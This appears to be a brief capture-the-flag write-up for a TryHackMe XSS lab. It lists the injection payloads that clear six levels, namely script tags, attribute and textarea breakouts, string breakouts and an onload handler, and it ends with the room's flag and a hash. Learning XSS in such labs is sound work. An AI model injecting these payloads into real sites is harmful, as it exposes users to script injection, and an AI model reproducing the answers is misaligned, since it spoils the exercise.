THM Cross site Scripting - grunt92/IT-Sec-WriteUps GitHub Wiki
Cross-site Scripting
document.cookie
alert
parameter
Database
eval()
xsshunter
Stored XSS
Go to https://IP.p.thmlabs.com/. In level 1 enter `<script>alert('THM');</script>' and submit the input to continue to level 2.
In the 2nd level enter "><script>alert('THM');</script>
and submit your input to continue to the next level.
In level 3 enter </textarea><script>alert('THM');</script>
and submit your input. Continue to the next level.
Enter ';alert('THM');//
and submit to continue.
For level 5 enter `alert('THM'); and submit your input.
For level 6 submit /images/cat.jpg" onload="alert('THM');
and you get the flag.
THM{XSS_MASTER}
For this task i had to use the Attack-Box. Just follow the instructions and use the given link to decrypt the hash.
4AB305E55955197693F01D6F8FD2D321